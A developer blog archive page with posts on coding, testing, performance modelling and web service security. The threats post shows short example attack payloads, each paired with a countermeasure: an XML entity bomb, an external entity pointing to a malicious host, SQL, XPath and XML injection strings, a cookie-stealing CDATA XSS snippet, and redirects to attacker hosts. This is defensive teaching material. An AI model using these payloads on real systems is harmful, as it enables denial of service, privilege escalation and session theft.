Showing posts with label software testing. Show all posts
Showing posts with label software testing. Show all posts

Tuesday, January 8, 2013

Software Guidelines: Coding principles, Usability, Test

This is a part of the blog series about (SOA) software guidelines. For the complete list of the guidelines (i.a. about design, security, performance, operations, database, coding, versioning) please refer to: http://soa-java.blogspot.nl/2012/09/soa-software-development-guidelines.html


Coding principle

  • Follow the best practices / style guidelines in your programming environment / programming language. Use automatic style checking (e.g. findbugs, checkstyle, PMD).
  • Strive to self-documented code. Add comments if necessary. Use Javadoc.
  • Use a good IDE (e.g. Eclipse, VisualStudio) and good tools (e.g. SOAPUI for web service test, Maven for build, Hudson for continuous integration, Trac.)
  • Use software configuration management (SCM) system (e.g. SVN)
  • Use proven design patterns and beware of anti-patterns
  • Limit accessibility: e.g. declare classes/methods/fields as private instead of public
  • Loose coupling, strong cohesion e.g. Spring dependency injection.
  • Aspect oriented programming, separation of concerns (e.g.  Spring AOP for logging, security, transaction, error handling, cache)
  • Use declarative configurations instead of programmatic coding for cross cutting concerns (e.g. WS-policy for security) . The code ideally only focus to the business logic, has little knowledge of the framework (e.g. using AOP & declarative transactions in Spring to hide the underlying transaction mechanism).
  • Use templates to reduce coding (e.g. Spring DAO templates, Velocity JSP templates)
  • Use standard library/solutions don't reinvent new wheels.
  • If you use multithreading: beware of locking effects to the performance, beware of race condition
  • Defensive programming:  test before executing (e.g. null checking in Java/BPEL), handle exception gracefully, protect from bad inputs (validate, substitute with legal values).
  • Beware of common errors in your development language (e.g. null pointer exception in Java or buffer overflow in C++)
  • Use abstraction layer (e.g. use JAAS for authentication, DAO layer for database access) for loose coupling / flexibility
  • Choose libraries, vendors, tools carefully, consider e.g. maturity, popularity, support, future viability
  • Use thin clients (more robust, better performance)
  • Use early/static binding for better run-time performance
  • Use pre-assign size instead of using dynamic growth datatype
  • Use pre-assign number of parameters  instead of using dynamic number of params
  • Build the instrumentation up front during coding, e.g. test (TDD, performance measure), logbuild/deploy script.
  • Reuse result (e.g. using temp variables) to reduce number of calls
  • Use implicit interface instead of explicit to reduce method call overhead.
  • If you use asynch/multithreading, do you have message timing/sequencing problem en how to deal with this problem? e.g.  if the software received 3 message events (in arbitrary sequence) which are order interdependent?
  • Write a short "getting started" developer document (e.g. designs, data models, class diagrams, dependencies, configurations, service request/response examples, troubleshooting / error scenarios). This document will be especially useful when you act as an external consultant / temporary project developer or if you need to pass the project to other colleagues (perhaps you leave the company, or have to take another project, or get promoted :).

Version management

·         How the services & wsdl/schemas (e.g. common data model) are versioned?
·         How the services are retired? Do you consider back compatibility? How many back-versions will you keep maintain?
·         Provide standard structures in the software configuration management/SCM folders (e.g. folders for Java codes, BPEL codes, WSDL, XSD, XSLT/Xq,  test codes, server-specific-deployment-plan, project documentations, project artifacts/deliverables).
·         Minimum codes in the SCM, no prototypes (which might ignores some QoS such as security) / deprecated codes in the head SCM revision. Put the prototypes in the branches.
·         Minimize the amounts of jms resources: use the same channel for different message versions (e.g. identified by version tag in the soap header/namespace) so instead of using 3 topics (updateEmployee1.1, updateEmployee1.0, insertEmployee1.0) you can use only 1 Employee topic for better manageability & performance. If your service can only process a specific version, use selective consumer pattern http://www.enterpriseintegrationpatterns.com/MessageSelector.html.

Test

  • Have test cases created for (all) user cases and functional requirements? Do you test all SLA/non-functional requirements (e.g. response time, availability/robustness, compatibilities)? Are the test cases tractable to the requirement numbers?
  • Have test cases were created for all exceptions (negative tests), include network failure
  • Have you test variety of data input (valid, invalid, null/empty ,boundary values, long input)?
  • Are the tests are reproducible (e.g. automated, documented, code available in SCM, test case inputs in the database)?  It's advisable to rerun the tests (regression test, performance test) when the administrator add a new module/patch, add a new service, or change configuration.
  • How do you perform regression tests to prevent side effects (e.g. triggered by Hudson/a continuous integration framework)?
  • Do you consider also exploratory tests? If the person who perform the exploratory tests has enough experiences? Do more experience person need to assist him for pair-tests?
  • Does the test environment is comparable with the production (e.g. hardware performance, security constraints, OS/software/patch versions, server configurations)? Do you use a virtual lab to clone the production environment for test (e.g.LabManager)?
  • Use realistic data.
  • See test checklists: http://soa-java.blogspot.nl/2012/09/test-checklists.html
  • Reconciliation test (e.g. for asynchronous processing, for automatic document processing): compare number of input orders with number of fulfilments/ outputs. This test to detect 2 problems: order that never be fulfilled, order that fulfilled twice.


Meer over software test:
Test checklists http://soa-java.blogspot.nl/2012/09/test-checklists.html
Development test http://soa-java.blogspot.nl/2012/09/development-test.html


Usability, GUI, User-friendliness

  • Involve users during GUI design, prototyping, test (e.g. regular Sprint demo)
  • Use iterative prototyping (e.g. Scrum sprint demo) for frequent user feedbacks.
  • Avoid complex pages. Keep it simple. Start with just enough requirement. Design and implement not more than what the requirements need. Use minimum number of GUI widgets.
  • Anticipate user mistakes (provide cancel/undo button,  defensive programming e.g. invalid user input).
  • Minimum user efforts.
  • GUI structure & flow/navigation are clear/intuitive/logicconsistent, predictable.  Use business workflow to drive GUI forms & flows design.
  • Conform to user culture (e.g. domain terminologies) and standard web-style (e.g. colors, typography, layout) at user organization.
  • User documentation / help provided.
  • Update GUI progressively with separate threads (using Ajax for example) to improve responsiveness.
  • Use paging GUI (e.g. display only 20 results and provide a "next" button).
  • Condition the user to enter detailed query in order to reduce the results and minimize the round trips of multiple searches.
  • Update the user with the application status (e.g. progress bar) and the manage user expectation (e.g. Your request has been submitted. You will receive the notification within 2 days.)
  • Inform the user to avoid surprise and confusion when the application will be forwarded to external application (e.g. before OAuth authorization confirmation,  before IDEAL money transaction).
  • Image cost bandwidth (especially for mobiles) so minimize image sizes & number of images.
  • Avoid expensive computation when the user waiting, use asynchronous pattern or render the result progressively.
  • When the backend is busy prevent the impatient users to resent requests that will hinder availability more by informing the user "e.g. your request is being processed, please wait"  or disable the submit button.
  • For mobile web/applications:
    • Reduce information (due to limited screen): use only about 20% information/features from the normal web version.
    • GUI components are big enough and well-separated for finger touch input.
    • Provide links to the normal (PC version) webpage or text-only (low bandwidth) version.
    • Device awareness & content adaptation e.g. viewport according to screen size.
See Web-GUI checklist http://www.maxdesign.com.au/articles/checklist/


Source: Steve's blogs http://soa-java.blogspot.com/

Any comments are welcome :)




Monday, October 1, 2012

How to address software performance issues: Proactive vs Reactive ?


As a Java developer, it was quite fun to learn a lot from the .Net communities, for example "the patterns & practises" series which are provided for free by Microsoft. Here are some lessons to learn from "Improving .NET Application Performance and Scalability" by Meier et.al.

Reactive approach

• You investigate the performance only if you face performance problems after design & coding to avoid premature optimization.
• Your bet is that you need to tune & scale vertically (buying faster/more expensive hardware, more clouds-resources). You experience increased hardware expense / total cost of ownership.
• Performance problems are frequently introduced early in the design and cannot always be fixed through tuning or more efficient coding. Also, fixing architectural / design issues later in the cycle very expensive nor always possible.
• You generally cannot tune a poorly designed system to perform as well as a system that was well designed from the start.

Proactive approach

• You incorporate performance modelling and validation since the early design.
• Iteratively you test your assumption / design decision by prototyping and validating the performance for that design (e.g. Hibernate vs iBatis)
• Evaluate your tradeoffs of performance/scalability with other QoS (data integrity, security, availability, manageability) since the design phase.
• You know where to focus your optimization efforts
• You decrease the need to tune and redesign; therefore, you save money.
• You can save money with less expensive hardware or less frequent hardware upgrades.
• You have reduced operational costs.


Performance modelling process

1.Identify key scenarios (uses cases with specific performance requirement/SLA, frequently executed, consume significant system resources, run in parallel)
2. Identify workload (e.g. total concurrent users, data volume)
3. Identify performance objectives (e.g. response time, throughout, resource utilization)
4. Identify budget (max processing time, server timeout, CPU utilization percent, memory MB, disk I/O, network I/O Mbps utilization, number of database connections, hardware & license cost)
5. Identify processing steps for each scenarios (e.g. order submit, validate, database processing, response to user)

For each steps:

6. Allocate budget
7. Evaluate (by prototyping and testing/measuring): Does the budget meet the objective? Are the requirement & budget realistic? Do you need to modify design / deployment topology?
8. Validate your model.


Performance Model Document

The contents:
• Performance objectives.
• Budgets.
• Workloads.
• Itemized scenarios with goals.
• Test cases with goals.

Use risk driven agile architecture

First, prototype and test the most risky areas (e.g. unfamiliar technologies, strong requirement in SLA). The result will guide your next design step. Repeat the past test again (regression test) in the next spirals for example using continous integration. When you address the most risky areas first, you still have more breath looking for alternatives or renegotiate with the customers in case of problems.



Source: Steve's blogs http://soa-java.blogspot.com/

Any comments are welcome :)


Reference:

"Improving .NET Application Performance and Scalability" by Meier et.al.

Monday, September 17, 2012

Web Service Security: Threats & Countermeasures

 

Denial of Service (DoS)


Oversize payload / Recursive XML

<attack1>
  <attack2>
        .... nested 10000 elements
            <attack10002> .... big data ....  <attack10002> ....
Countermeasure: limit the message size with gateway/firewall, XSD restriction length, limit nested element deep, don't use maxoccurs="unbounded" in XSD.
While we can also limit the message using application-server setting or XSD validation in the proxy, it's better to reject the messages  as early as possible (e.g. in the gateway with XML firewall) before the message burden the load balances and application-servers.
Use throttling (also in the log file generation).

Entity Expansion / XML bomb

Excessive/recursive reference to entity to overwhelm the server, e.g.
<!DOCTYPE s[
<!ENTITY x0 "hack">
<!ENTITY x1 "&x0;&x0;">
... Entities from x1 to x99... 
<!ENTITY x100 "&x99;&x99;">
]>
...
 <soapenv:Body>
  ...
  <s>&x100;</s>
Countermeasure: reject message with <!ENTITY> tag (or whole DTD tag), use SOAP 1.2, use XML firewall.

XML External Entity DOS

Entity reference to external resources (e.g. a huge file) to overwhelm the server, e.g.
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY hack SYSTEM "http://malicious.kom/bigfile.exe" >
]>
...
 <soapenv:Body>
   ...
   <foo>&hack;</foo>
Countermeasure: reject message with <!ENTITY> tag (or whole DTD tag), use SOAP 1.2, use XML firewall.

Malformed XML

To overwhelm the server with exceptions, e.g. omitting XML closing tag or wrong date-time format.
Countermeasure: XSD validation.

Weak XML definitions

e.g. <any> element which allows any additional elements
Countermeasure: prevent the use of <any>.

Buffer overflow

Oversize message to override variables / operation address, DoS attack
Countermeasure: use programming language/frameworks which is more safe regarding buffer overflow (e.g. Java), bounds checking.

Non-content attacks

The DOS attacks described above mainly are content-based by sending malicious / oversize contents. But web services are indirectly also vulnerable to non -content attacks (e.g. SYNC-flood) that will overwhelm the network infrastructure (firewall, switch/router).
Countermeasure: using firewall/switch/router with anti DOS filtering features such as TCP splicing/protocol analyzer, bogus filtering, anomalies detection, rate limiting.


Command Injection


SQL injection

Manipulate the parameters such that it will run a malicious sql statement in the database.
e.g. <password>' or 1=1 </password>
Countermeasure: XSD validation, sanitize

Xpath injection

e.g.
//user[name/text()='Admin' and password/text()='' or '1' = '1'
or use union |  to extend query.
Countermeasure: XSD validation, sanitize


XML Injection

Web service input:
Username: tony
Password: Un6R34kb!e</password><!–
E-mail: --><role>admin</role><mail>s4tan@hackers.com

The result in the xml database:
<user>
    <username>tony</username>
    <password>Un6R34kb!e</password><!--</password>
    <role>guest</role>
    <mail>--><role>admin</role><mail>s4tan@hackers.com</mail>
</user>
So I change the default role guest to admin.

Countermeasure: XSD validation, sanitize (e.g. encode <,>)

XSS using CDATA Injection

Vulnerabilities when you use display the WS responds to web page or evaluate the responds as Ajax objects, e.g.to reveal sessionID in the client cookie:
<![CDATA[<]]>script<![CDATA[>]]>alert(document.cookie) <![CDATA[<]]>/script<![CDATA[>]]>
Countermeasure: XSD validation, sanitize (e.g. encode <,>)

Execute binary files or system call command

The attack methods above (e.g. SQL injectrion, XML injection) can be used to run system commands using the databases / XML processors features (e.g. XSLT exec())
Countermeasure: XSD validation


Malicious Reference

Routing Detour

The attacker change the reference address in http-header/WS-Routing/WS-Addressing, e.g.
<wsa:ReplyTo>
  <wsa:Address>http://hackersWS</wsa:Address>
</wsa:ReplyTo>
Countermeasure: SSL


Reference Redirect

Reference to malicious external reference. e.g.
<sig:Signature>
  ....
  <sig:Reference URI="http://maliciousweb/VERYBIGFILE.DAT">
Countermeasure: prohibit reference to resource outside the document.

Impersonation

Malicious/ web service with the similar interface (wsdl)
Countermeasure: protect the web service reference from man in the middle attack with SSL. Use certificate authentication.

Authentication (WSS or transport-level)


Weak password

The attacker guest the password (e.g. using brute-force / dictionary attack)
Countermeasure: use stronger authentication (e.g. certificate based,  multi factor authentication), enforce strong password (e.g. minimum length & character sets), lockout account after multiple authentication failures, don't give clue to the hackers e.g. "valid username but wrong password".

Reply attack

The attacker capture the authentication token (e.g. password, session-token) and then reuse it in his request.
Countermeasure: one time nonce/password digest, SSL, use certificate-based authentication


Authorisation


URL transversal attack

e.g. the hacker knows the Restful WS endpoint
GET http://library/booklist/?title="hacking"
the attacker might try
GET http://library/secretdocumentlist/?title="hacking"
Countermeasure: ACL on the URL tree.

Web parameter manipulation attack

REST WS e.g.
GET http://library/secretdocumentlist/?role="employee"
GET http://library/secretdocumentlist/?role="boss"
Countermeasure: ACL. Don't make security decision base on URL params (sessionID, username, role) .

Illegal Web method

e.g. The attacket know the Restful-WS url for GET operation to get the data, he can try POST operation to modify the data.
Countermeasure: ACL for method access.


Encryption


Weak cryptography

Countermeasure: Use well-proven encryption algorithms (e.g. AES) in well-proven libraries instead of inventing and implementing your own algorithm. Protect your key.

Failure to encrypt the messages

You don't use encryption, the attackers can capture your authentication token and use it to impersonate you.
Countermeasure: Use encryption (e.g. SSL or WSS & XML-Encryption)

Messages are not protected in the immediateries

You use point to point encryption SSL but inside the intermmediateries  your message is decrypted. The immediateries can read your sensitive data and use it for his advantage.
Countermeasure: Use end to end encryption (WSS & XML-Encryption)

Data tampering

An attacker modifies your message for his advantage.
Countermeasure: signature and encryption (WSS & XML-Encryption)

Schema poisoning/ metadata spoofing

Maliciously changing the WSDL (e.g. to redirect the service address to malicious web, to manipulate data types, to remove security policy) or manipulating the security policy document (to lower security requirement), e.g.
<wsdl:port name="WSPort" binding="tns:WSBinding">
  <soap:address location="http://hacker.kom/maliciousWS"/>
</wsdl:port>
Countermeasure: check the authenticity of metadata (e.g. signing), use SSL to avoid man in the middle attack

Repudiation

A client refuses to acknowledge that he has misused the user-aggreement (e.g. perform dictionary attack against web-service authentication).
Countermeasure: keep client message signature in the log. Protect the log files.



Infomation disclosure



WSDL disclosure

WSDL contains many information for the attacker (operations, message format).
Countermeasure: protect the wsdl endpoint with ACL/firewall. Use robot.txt to avoid the wsdl appears in google.

UDDI disclosure

UDDI gives the attacker information about wsdl location.
Countermeasure: don't publish the wsdl in UDDI

Error message

Attacker send failure messages/DOS attack such that the web service will return error messages which can reveal information (e.g. database server address, database vendor).
Countermeasure: don't publish sensitive information (e.g. connection string) in the error message. Sanitize error message (e.g. the stacktrace)


Testing Tools

• SOAPUI
• WSDigger
• WSFuzzer



Security checklist:

http://soa-java.blogspot.nl/2012/09/security-checklists.html


Web service message level security WS-Security (WSS) and transport level security (TLS):
http://soa-java.blogspot.nl/2013/04/web-service-security-message-level-vs.html


Please share your comment.

Source: Steve's blog http://soa-java.blogspot.com





References:

• SOA Security by Kanneganti





Oracle Service Bus 11g Development Cookbook by Schmutz & Biemond et.al.





Developing Web Services with Apache CXF and Axis2 by Tong


• Ws-Attacks.Org
• Web Service Hacking, Progress Actional Whitepaper
• OWASP Web Service Security Cheat Sheet
• Attacks on Web Services By Bidou
• Web Services Security By Negm, Forum Systems Inc.
• OWASP Top Ten Web Services Vulnerabilities By Morana
• Http://Www.Soapui.Org/Soap-And-Wsdl/Web-Service-Hacking.Html
• NIST guide secure web service
•  http://clawslab.nds.rub.de/wiki/index.php/XML_C14N_Entity_Expansion
•  http://clawslab.nds.rub.de/wiki/index.php/XML_External_Entity_DOS
http://projects.webappsec.org/w/page/13247004/XML%20Injection
• http://clawslab.nds.rub.de/wiki/index.php/Routing_Detour
• http://clawslab.nds.rub.de/wiki/index.php/Reference_Redirect

Tuesday, September 11, 2012

Security Checklist


This list is mainly for developers, but can be useful also for architects, security managers and testers. Mainly from design and coding perspective, enriched with configuration, operational and human process aspects.

Please see also "Web services security threats": http://soa-java.blogspot.nl/2012/09/web-service-security-threats.html

This is a part of the blog series about (SOA) software guidelines. For the complete list of the guidelines (i.a. about design, security, performance, operations, database, coding, versioning) please refer to: http://soa-java.blogspot.nl/2012/09/soa-software-development-guidelines.html

General design principles

• Prefer to use policy based declarative security instead of programmatic security: separation between security configuration and business code. Beware that both business code and the security configuration typically have different life cycles and implemented/managed by different people.
• Use declarative security instead of programative, separation between application logic and the cross-cutting concerns (e.g. security, logging).
• Prefer to use message level / end-to-end security (e.g. WSS) than transport level / point-to-point security (e.g. SSL): to protect the messages in the intermediate services and flexibility to protect only portions of the messages (due to performance).
• Does the service/data need authentication, authorization, signature/non-repudiation, encryption?
• If the web service is used to wrap a legacy service: aware about vulnerabilities of the legacy service, aware about how to reconcile the security model (e.g. credentials/roles mapping) or some legacy application doesn't have any security provisioning at all
• Use white lists instead of black lists
 Throttling the requests / messages-size to prevent DoS
• Defense in depth: don't rely on a single layer of security (e.g. apply also authentication & SSL instead of protecting the infrastructure with firewall only)
Check at the gate (e.g. validate and authenticate early)
• Secure the weakest link
Compartmentalize: isolate and contain problems e.g. firewall/DMZ, least privileged accounts, root jail.
• Secure by default e.g. close all ports unless it's necessary
• Communicate the assumptions explicitly e.g. firewall will secure all our internal services with no ports open to outside world
• Understand how the infrastructure restriction (e.g. firewall filtering rules, supported protocol, ports allowed) will affect your design
• Understand the organizational policies/procedure (e.g. what applications and users are allowed to do) so you don't have acceptance problem by production team because your services breach these policies
• Understand the deployment topology due to your organization structure (e.g. your company has many remote branches offices connected to the main server-farm via VPN)
• Understand the identity propagation / credential mapping across trust boundaries (e.g. apache web account >  weblogic web service account  > database account)
Security measures (e.g. authentication, encryption, signing) will cost performance (increasing processing cost and message size) as well as other qualities attributes such as usability, maintainability (e.g. distribution of certificates) and operability (e.g. security service / identity provider failure). So consider the trade off between security and other quality attributes regarding your company infrastructure and policies (e.g. if the firewall policy in your company is very strict, you might lessen the encryption requirement for the intern services).
• While applying security by design, I still keep the "security through obscurity" to some extent, e.g. I will not publicly publish the security architecture of my company (the endpoints/ports, wsdl/schema, libraries used, etc).


Security process & management


• Design & code review (e.g. login & logout mechanism, authorization logics in each Struts actions)
• Include security in your development process (e.g. SDL), use thread modeling during analysis & design phase.
• Make sure that your programmers and network/servers administrators capable to deal with security issues, arrange training if necessary.
• Make sure that the operational team know the contingency procedure (e.g. what to do in case of DoS attack or virus spreading in your network). Have contingency plan / crisis management document ready: procedures to where the configurations are, how to isolate, handle failures, how to restart in safe mode, how to turn-on/turn-off/undeploy/deploy modules/services/drivers, who/how to get informed, which services/resources have priorities (e.g. telephony service, logging service, security services).  Have this document in multiple copies in printed version (the intranet and printer may not work during crisis). The crisis team should have exercised the procedures (e.g. under simulated DOS attack) and measured the metrics during the exercise (e.g. downtime, throughput during degradation mode).
• Plan team vacation such that at least one of the crisis team member always available. Some organizations need 24/7 full time dedicated monitoring & support team.
• Hire external party for penetration testing and security audit.
• Document incidents (root causes, solutions, prevention, lesson to learn), add the incident handling procedures to the crisis management document.
• Establish architecture policies for your department. Establish a clear role who will guard the architecture policies and guidelines e.g. the architects using design/code review.
• For maintainability & governance: limit the technologies used in the projects. Avoid constantly changing technology while still open to the new ideas. Provide stability for developers to master the technology.
• Establish change control. More changes means more chances of failures. You might need to establish a change committees to approve the change request. A change request consists of why, risks, back-out/undo plan, version control of configuration files, schedule. Communicate the schedule with the affected parties before.


 Authentication

• Prefer to use stronger authentication (e.g. 2-way X.509 certificate authentication) than basic authentication (password based).
• If you use basic authentication use SSL or password digest to protect the password.
Credentials, authentication token / password are stored with encryption / salted hash
• Force users to use strong password and/or multi factor authentication. Use password expiration feature.
Avoid to send passwords to external application (e.g. when an external application need to access resource services), use OAuth instead.
 Disable test and example accounts.
Credentials (e.g. password, service accounts) are centralized (e.g. in an LDAP server) for better manageability. Redundancy (e.g. fail-over clusters) can be used to prevent single point of failures.
• If you use certificate based certification: always check the validity of the certificates (e.g. using CRL).
• Prevent brute-force / dictionary attacks (e.g. for add a new user webpage) using CAPTCHA, email validation, locking after max-attempts.
• Using SSO / centralized security service: users don't have to have many accounts/passwords, users don't have to share their passwords with many applications/resources, the developers don't have to maintain multiple authentication mechanisms in different systems. With federated Identity provider, you can centralized the credentials across organizations.
• Use standard security solutions (e.g. OAuth, OpenID, SAML to exchange security messages), don't reinvent new wheels. It's more risky to implement your own security solution than using a well tested solution.
• Authentication should be in the server side (instead of client side/JavaScript).
• Avoid having password as plain text in the configuration files (e.g. fstab), save passwords in the password files / credentials files and protect these files (chmod 600 and encryption if possible).
• Beware with remote OS authentication for example in Oracle database since an attacker can try to connect using a username that has the same name with the OPS$account in the database.
• Send confirmation when a user change his/her password, email, mobile or other sensitive personal data.


Session management

• Limit the life time of cookie or authentication/authorization tokens.
• Prevent replay attack by using one time nonce.
• Prevent CSRF using secret nonce as a request parameter (e.g. for OAuth) and validate the nonce in the server side, beware that a nonce cookie doesn't prevent CSRF.  Prevent CSRF by informing the user about the action (e.g. "you're about to transfer $100") and ask for reconfimation/reauthentication.
Session ID is strongly random generated, at least 128 bits length.
• Appropriate logout mechanisms (e.g. invalidate sessions, clear all cookies).
• Force user to re-authenticate for sensitive operations (e.g. change password).
Hide sessionID (e.g. in secure cookies instead of in GET url parameter or hidden form field).
• Validate the security token with HMAC or encrypt the token e.g. session ID cookies must be encrypted / using HttpOnly secure cookies.
• Limit the cookies domain & path.
• Always provide logout feature. Make sure that logout is properly done (invalidate session, remove session cookies).
• Issue a new session id for each login action (to prevent session fixation).
• Identify possible session hijacking for multiple IP addresses / geolocation which are simultaneously use the same sessionID.
• Use anti caching http header (Cache-Control: no-cache and  Pragma: no-cache).
• Use IE HttpOnly to prevent client (java)scripts query the cookies.
• Set the session timeout.
• Appropriately handle requests which indicate security check circumvention or an obvious attempt for privilege escalation,e.g. in case of requests with invalid sessionID: log the sender's IP address, invalidate the session and redirect to login page.

Authorisation

• Determine which web service operations or which web page/actions need authorization.
• Determine the privilege/roles for your service/web.
• Strong ACL (in operating system/file system level, application level, servers).
• Apply the least privilege principle, don't use admin account for daily operations (e.g. read database), create specific accounts for specific operations (e.g. CreditcardReadOnlyAccount, UpdateInventoryAccount, WebShopInventoryReadOnlyAccount).
Audit/log administrator activities (e.g. create new user, grant).
• Remove the default accounts & ACL in your system if possible (e.g. remove BUILTIN/Administrators group from SQL Server login) or rename the default (administrative) accounts if possible (e.g. sa user  in SQLServer).
• Run the server in root jail.
Centralized authorization (e.g. using OAuth) to reduce the burden of reconciling different access-right in different systems across trust-boundaries (e.g. apache  role=boss mapped to database role =  readwriteEmployeeData).
• Using ACL on URL tree and web methods allowed e.g. the REST url http://myweb.kom/myprofile should only be accessible for me & myfriends only for GET method and for me only for the PUT method.
• Use ACL to protect directory and files from transversal attack.
• Use ACL per user/session to filter direct & undirect references (e.g. links).
 Authorization check in all protected GUI operations (e.g. Struts-actions, Admin html page) and web service operations.
• Beware of the system calls feature in your framework that can be used for hostile purposes, e.g. Runtime.exec() in Java or store procedure xp_cmdshell in SQLServer. Solution: root jail, least privelege accounts, ACL, disable unnecessary features, run the application server with read-only privilege on web-root directory (e.g. Apache  nobody user).
• Make sure account lockout doesn't result in DoS.
 Check (e.g. using a white-list) all references submitted via input (e.g. webservice request, file, database).
• Avoid url-jumping (e.g. Checkout -> Delivery instead of Checkout -> Payment -> Delivery) by checking the last visited page (e.g. in session variable ).
• Remove guest account / anonymous login if it's not really needed. At least review the guest / public account, remove unnecessary privileges from this account.
 Review the ACL (& authentication credential lists) regularly to detect forgotten change actions (changed roles, departed employees)


Confidentiality, Encryption, Signing

• Encrpt/hash sensitive data e.g. bank-accounts in the LDAP production copy used for development/test.
• Use message-level XML-Encryption to protect sensitive data in the intermediaries / external proxies / clouds. The point-to-point SSL doesn't prevent the intermediaries to read the sensitive data. With WS-Encryption it's also possible to encrypt only a part of the messages, thus more flexible (e.g. in case the intermediary proxy need to peek the unencrypted part). The message-level security (e.g. WSS Authentication, XML-Encryption, XML-Signature) is independent to the protocols thus it offers more flexibility to send SOAP messages across different protocols (e.g. http, jms, ftp).
• Use signature and saved logs for non-repudiation
• Use signature for message integrity
• Protect the key (e.g. don't backup the key and the encrypted data in the same backup-tape)
• Use well-proven encryption algorithms (e.g. AES) in well-proven libraries instead of inventing and implementation your own algorithm.
• Don't register sensitive services to UDDI
• Use robot.txt to avoid the sensitive files (e.g. WSDL, source codes, configuration files, confidential documents)  appears in Google.
• Don't store secrets in the client side (e.g. hidden form field, cookies, HTML5 storage). If you really need to store sensitive data in the client (or to pass them in the message): obfuscate the name and encrypt/hash the value. Beware of persistent cookies (the information will be written to the file system hence can be read by malicious users)
• Secure backup (e.g. with encryption), store it in a secure place.
• Avoid mixed SSL - nonSSL web sites (it causes user warning in the browser and can expose user ID.) Use CA-valid certificates (to avoid user warning in the browser).
• An example of deployment pattern: using DMZ proxy servers between outer and inner firewall to expose (enterprise) services to public. The servers in de DMZ are treated as bastion hosts, special attentions are given to protect these servers against attacks.
• Load sensitive data on demand, clear them from memory as long as you don't need them anymore. Don't keep/save them (e.g. in session variables or cache) if it's not really necessary.
• Use enough key size. Securely distribute, manage and store the keys. change the keys periodically.

Coding

 Limit accessibility: e.g. declare classes/methods/fields as private instead of public
• Declare sensitive classes/methods/fields as final so they can't be overwritten
• Don't write secrets in the code (e.g. database connection string), beware that the secret strings in the compiled classes can still be read using reverse engineering tools
• Remove test code, example code, example database
• Using framework/library functions can be more safe than building your own function (e.g. using jquery .ajax to process json response from ajax calls instead of plainly using eval). But make sure that the third-party libraries that you use is save (e.g. code review) and follow the security newsgroup for that library.
• Use jsp comment tag instead of html comment to avoid the code comments will be visible to the client
• Use prepared statement for querying database to protect against sql injection (and better performance).
• If you need to redirect via url parameter consider using mapping value instead of the actual url link. Make sure that the redirect url is valid and authorized for the user.
• Beware of null insertion, e.g. circumvent  if ($user ne "root) using user="root/0" in Perl. Solution: validate inputs.
• Beware of buffer overflow attack (e.g. to override variables / operation address, DoS attack). Solution: use programming language/frameworks which is more safe regarding buffer overflow (e.g. Java), bounds checking
• Beware of race condition exploitation for example to overwrite the username of another individual's session. Solution: avoid sharing variable between sessions via global variables / files / database /registry entry.
• Use CAPTCHA to distinguish genuine human inputs from robot inputs.

Configuration / operation management

• Protect / restrict access to configuration files & admin interfaces.
Encrypt/hash sensitive configuration data (e.g. database connection, password).
 Centralized security management (e.g. OPSS for Oracle Fusion Middleware, JAAS for java applications) instead of managing different configurations spreading from GUI, web services, database.
• To prevent DOS attack: restrict message size (e.g. default 10MB in Weblogic) and set server timeout. It's better to countermeasure DOS as early as possible (e.g. in the firewall/gateway with Cisco rate limit) before the load balancers & application servers.
• Run application-servers/database/ldap with minimum privilege, avoid running the server as root.
• Reduce attack surface: disable unnecessary daemons, ports, users/groups, apache-modules, network storages in the server. Disconnect network file servers if it's not necessary
• Update the OS/applicativon-servers/database/Ldap/libraries with latest (security) patch
• Remove the temporary files (e.g. hibernate.properties.old or httpd.conf.bak)
• Audit/scan regularly for new vulnerabilities. It's not enough to do penetration test only during the first acceptance-test since the attack surface can grow with time.
• Follow the security newsgroups/websites (e.g. BugTraq), discuss the potential new threats with your security manager.
• Monitor the system lively for early detection of anomalies (e.g. multiple malicious logins from a certain IP address, unusual frequent web/soap requests to a certain url). Use Intrusion Detection System (IDS).
• Change the default application ports. Close the unnecessary ports with firewall.
• Minimize the allowed IP address source by using firewall, Apache httpd file, Weblogic connection filter.
• Use separate environments  production, test, development, sandbox playground (e.g. to test prototype or try new viral algorithms.) Each components in these environments have different credentials than in other environment. If the data in the test & development are based on production data (to make the test more realistic) the sensitive production data should be masked.
• The (security) test configuration should be identical to the production (e.g. firewall configurations, networks topology, timeout setting), for example you can use VMWork's LabManager to achieve this.
• Hide server information in http header (e.g ServerSignature Off in apache.conf).
• Turn off http trace feature (e.g. using Apache mod_rewrite), turn off debugging feature in production.
• Centralized security management (e.g. in case of Weblogic infrastructure: using OWSM with security policies) for  better manageability, reduce mistake.
• Use configuration change detection system (e.g.  monitor admin activities log files, Tripwire.)

Data

Minimum data presented to any business request
• Don't blindly trust input data (from clients GUI/cookies, database, web service request), so always validate and sanitize the input
• Validate/preprocessing (to prevent code/SQL/command injections, XSS, DoS) in sequence:
    o canonization: transform different representation (e.g. %5c is "/" which can be used for directory transversal attack)  to a canonical form.
    o sanitation: encode/escape unwanted characters (e.g. &lt for <).
    o data validation: validate based on white lists (e.g. XSD that defines data type/format/range).
• To prevent DoS, XML bomb: limit input size (e.g. web service request, file upload via GUI) using gateway/server configuration, XSD restriction length, limit nested element deep, don't use maxoccurs="unbounded" in XSD. While we can also limit the message using application-server setting or XSD validation in the proxy, it's better to reject the messages  as early as possible (e.g. in the gateway with XML firewall) before the message burden the load balances and application-servers.
• No security decision based on url params (which can be manipulated by clients).
• Validate & sanitize output (e.g. web, database) to prevent XSS, code injections.
• Use output encoding for special characters (to prevent XSS, code injections).
• Beware of double-encode attack (e.g. \  > %25 > %255c  ).
• Do not store sensitive data in cookies.
• How to validation data input (from user input, database, external system)? How to handle validation-error situation?
• Avoid sensitive data in de code/scripts, config files, log files. Restrict access to these files (least privelege principle).
• Encrypt sensitive data (e.g. employees' bank account published by LdapService).
• How do you prevent data fishing (e.g. limit output)?
• Use XML-firewall: faster (dedicated hardware), delegate the burden of SOA/OSB servers for validation.  Reject the messages earlier for better containment and preserving performance: threat should be addressed at the edge of the network instead of at the application layer.
• Reject SOAP message with <!ENTITY> tag (or whole DTD tag) or  use SOAP 1.2 to protect against entity attacks.
• Reject SOAP message with CDATA to avoid CDATA injection.
Attachment/files upload:
    o limit the size
    o the files must never be executed/evaluated
    o anti virus check

Error handling

• Prevent sensitive information (e.g. server fingerprinting for hackers) in the error messages. Generalized error message (to hide the implementation technology) instead of just passing the original error string from the framework (e.g. Java stacktrace).
• Don't put human information (e.g. developer's name) in the error message to avoid social engineering exploit.
• Test and understand the behavior of your system in case of failure / error.
